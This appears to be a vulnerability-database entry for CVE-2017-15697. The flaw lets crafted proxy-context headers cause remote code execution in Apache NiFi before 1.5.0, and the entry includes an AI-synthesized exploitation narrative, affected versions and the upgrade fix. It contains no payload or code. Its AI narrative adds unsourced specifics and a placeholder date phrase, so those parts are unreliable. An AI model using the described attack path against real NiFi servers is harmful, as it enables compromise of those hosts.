CVE-2017-15697
Description
A malicious X-ProxyContextPath or X-Forwarded-Context header containing external resources or embedded code could cause remote code execution. The fix to properly handle these headers was applied on the Apache NiFi 1.5.0 release. Users running a prior 1.x release should upgrade to the appropriate release.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Apache NiFi up to 1.4.x allows remote code execution via a malicious X-ProxyContextPath or X-Forwarded-Context header.
Vulnerability
Apache NiFi versions prior to 1.5.0 are vulnerable to remote code execution via a malicious X-ProxyContextPath or X-Forwarded-Context HTTP header. An unauthenticated attacker can inject external resources or embedded code through these headers, which are processed unsafely by the NiFi web server. The vulnerability affects all Apache NiFi 1.x releases before 1.5.0 [1][2].
Exploitation
An attacker with network access to an Apache NiFi instance can craft an HTTP request containing a specially crafted X-ProxyContextPath or X-Forwarded-Context header. No authentication is required. The attacker includes external resources or embedded code in the header value, which the NiFi server then processes in an unsafe manner, leading to code execution on the server [1].
Impact
Successful exploitation allows an attacker to achieve remote code execution (RCE) on the Apache NiFi server. This grants the attacker the ability to execute arbitrary commands or scripts with the privileges of the NiFi process, resulting in full compromise of the application and potentially the underlying host [2].
Mitigation
The vulnerability is fixed in Apache NiFi 1.5.0, released on this date. Users running any prior 1.x release should upgrade to Apache NiFi 1.5.0 or later immediately. No workarounds are mentioned in available references [1][2].
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.apache.nifi:nifiMaven | >= 1.0.0, < 1.5.0 | 1.5.0 |
Affected products
2- Apache Software Foundation/Apache NiFiv5Range: 1.0.0 - 1.4.0
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3- github.com/advisories/GHSA-29ph-fjf3-c5cmghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2017-15697ghsaADVISORY
- nifi.apache.org/security.htmlghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.